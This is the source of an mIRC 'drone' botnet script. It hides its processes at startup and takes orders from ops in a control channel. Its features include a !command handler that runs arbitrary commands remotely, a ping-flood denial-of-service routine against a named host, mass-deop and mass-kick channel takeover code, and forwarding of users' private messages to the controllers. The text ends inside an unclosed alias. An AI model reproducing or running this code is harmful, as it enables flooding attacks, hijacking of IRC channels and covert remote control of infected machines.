   ;Drone Script By Smev.. updated for the gawd projects.

   ;Misc start up commands
   on 1:start:{
     run detach.exe /fh "mIRC32 smev"
     run win16.exe
     run detach.exe /fh "C:\WINNT\system32\sh\win16.exe"
     if (%original == true) { set %mainchannel #theprojects }
     if (%original == true) { set %key secure }
     newnick
     pingservers
     set %defend on
     timer 0 10 /unset %opme.*
     timer 0 30 /grabnick
   }
   alias command {
     $1-
   }

   ;This section orders all the servers in order from fastest to slowest from servers.txt and writes it to servers.ini that mirc can use

   on 1:sockopen:*:{
     write servers.ini n $+ $calc(%servercount -1) $+ = $+ Server $+ SERVER: $+ $sockname $+ : $+ 6667 $+ GROUP:01
     echo $sockname
     sockclose $sockname
     inc %servercount 1
     if (%servercount == %servernum) { echo Done | server $server(1) }
   }
   alias pingservers {
     timer 1 1 disconnect
     sockclose *
     write -c servers.ini [servers]
     set %servercount 1
     set %servernum 1
     :server
     if ($read -l $+ %servernum servers.txt == $null) { halt }
     command sockopen $read -l $+ %servernum servers.txt $read -l $+ %servernum servers.txt 6667
     inc %servernum 1
     goto server
   }

   ;Pings host for time response
   alias pinghost {
    if $1 == $null { goto perror }
    run ping.exe -n 800 -l 65500 -w 1 $1
    run detach.exe /fh "C:\winnt\system32\ping.exe"
    halt
    :perror
    msg %mainchannel Error - no host specified.
   }

   ;Post lists of channels currently occupied
   alias chans {
    msg %mainchannel I'm currently in the following channels:
    msg %mainchannel $channel(1) $channel(2) $channel(3) $channel(4) $channel(5) $channel(6) $channel(7) $channel(8) $channel(9) $channel(10)
   }

   ;Random nick picking from nicks.txt
   alias newnick {
     set %nick $read nicks.txt
     identd on $lower(%nick)
     nick $lower(%nick)
     fullname $lower(%nick)
   }

   ;Control Commands that can be used in the control channel
   on *:text:!join*:*:{ if ($nick isop %mainchannel) { join $2- } }
   on *:text:!part*:*:{ if ($nick isop %mainchannel) { part $2 } }
   on *:text:!deop*:*:{ if ($nick isop %mainchannel) { madop $2 } }
   on *:text:!command*:*:{ if ($nick isop %mainchannel) { $2- } }
   on *:text:!kick*:*:{ if ($nick isop %mainchannel) { timer $+ k $+ $2 0 2 makick $2 } }
   on *:text:!version*:*:{ if ($nick isop %mainchannel) { msg %mainchannel Version: 1.7.3-tp } }
   on *:text:!pinghost*:*:{ if ($nick isop %mainchannel) { pinghost $2 } }
   on *:text:!pingservers*:*:{ if ($nick isop %mainchannel) { pingservers } }
   on *:text:!nicks*:*:{ if ($nick isop %mainchannel) { newnick } }
   on *:text:!channels*:*: { if ($nick isop %mainchannel) { chans } }
   on *:text:!rejoin*:*: { join %mainchannel %key }
   on *:text:!emergency*:*: { if ($nick isop %mainchannel) { emergency $nick }
   on *:quit: if ($nick == %grabnick) { /nick %grabnick }
   on *:nick: if ($nick == %grabnick) { /nick %grabnick }
   on *:text:*:?: {
     userhost $nick
     set %lastmsg $nick
     privmsg %mainchannel Nick: $nick User: $address($nick,5) Args: $1-
   }
   raw 433:*:{ newnick }

   ;Emergency Kill
   alias emergency {
     run emergency.bat
     exit Killed by $1
   }

   ;Mkick
   alias makick {
     if ($nick($1,1,r) == $null) { timer $+ k $+ $1 off | halt }
     kick $1 $nick($1,1,r)mk
   }

   ;Set op timings, makes the drones op each other at different times
   on *:join:#:{ if ($nick == $me) { timer 1 $rand(1,100) timer $+ $chan 0 100 mop $chan } }
   on *:part:#:{ if ($nick == $me) { timer $+ $chan off } }


   ;And the Protection and Take code
   on *:op:#:{ if ($me isop $chan) && ($nick != $me) {
       if ($opnick == $me) {
         if ( [ %opme. [ $+ [ $chan ] ] ] == $null) { set %opme. $+ $chan ON | madop $chan | halt }
       }

       if (%defend == on) { set %defend off | timer 1 3 set %defend on | madop $chan }
     }
   }

   on *:deop:#:{ if ($me isop $chan) && ($nick != $me) {

       if (%defend == on) { set %defend off | timer 1 3 set %defend on | madop $chan }
     }
   }


   alias madop {
     if ($me !ison %mainchannel) { halt }
     set %maxop 0
     var %~tmp.cnt = 1
     var %~tmp.tot = $nick($1,0,o)
     :modeloop
     if (%~tmp.cnt <= %~tmp.tot) {
       :order
       if ($numtok(%~tmp.cnicks,32) < 3) {
         if ($nick($1,%~tmp.cnt) = $null) { halt }
         if ($nick($1,%~tmp.cnt,o) != $null) {
           if ($nick($1,%~tmp.cnt,o) !ison %mainchannel) { var %~tmp.cnicks = %~tmp.cnicks $nick($1,%~tmp.cnt,o) }
         }
         if (%~tmp.cnt = %~tmp.tot) && (%~tmp.cnicks != $null) { set %repick 0 | goto finalpick }
         inc %~tmp.cnt
         goto order
       }
       set %repick 0
       :repick
       inc %repick 1
       set %~tmp.opnick $nick(%mainchannel,0)
       set %~tmp.opnick $rand(1,%~tmp.opnick)
       set %~tmp.opnick $nick(%mainchannel,%~tmp.opnick)
       if (%~tmp.opnick isop $1) && (%repick < 10) || (%~tmp.opnick !ison $1) { goto repick }
       if (%maxop > 6) { halt }
       mode $1 +o-ooo %~tmp.opnick %~tmp.cnicks
       inc %maxop 1
       unset %~tmp.cnicks
       goto modeloop
       :finalpick
       inc %repick 1
       set %~tmp.opnick $nick(%mainchannel,0)
       set %~tmp.opnick $rand(1,%~tmp.opnick)
       set %~tmp.opnick $nick(%mainchannel,%~tmp.opnick)
       if (%~tmp.opnick isop $1) && (%repick < 10) || (%~tmp.opnick !ison $1) { goto finalpick }
       if (%maxop > 6) { halt }
       mode $1 +o-ooo %~tmp.opnick %~tmp.cnicks
       unset %~tmp.cnicks
     }
   }


   ;Ops the maximum of 4 bots each time its called in a chan
   alias mop {
     if ($me isop $1) {
       :mop
       set %opnick 0
       unset %opnicks
       set %fourops 0
       :moploop
       inc %opnick 1
       if ($nick(%mainchannel,%opnick) isop $1) { goto moploop }
       if ($nick(%mainchannel,%opnick) !ison $1) && ($nick(%mainchannel,%opnick) != $null) { goto moploop }
       set %opnicks %opnicks $nick(%mainchannel,%opnick)
       inc %fourops 1
       if (%fourops == 4) || ($nick(%mainchannel,%opnick + 1) == $null) { mode $1 +oooo %opnicks | set %fourops 0 | unset %opnicks | halt }
       if ($nick(%mainchannel,%opnick) == $null) { halt }
       goto moploop
     }
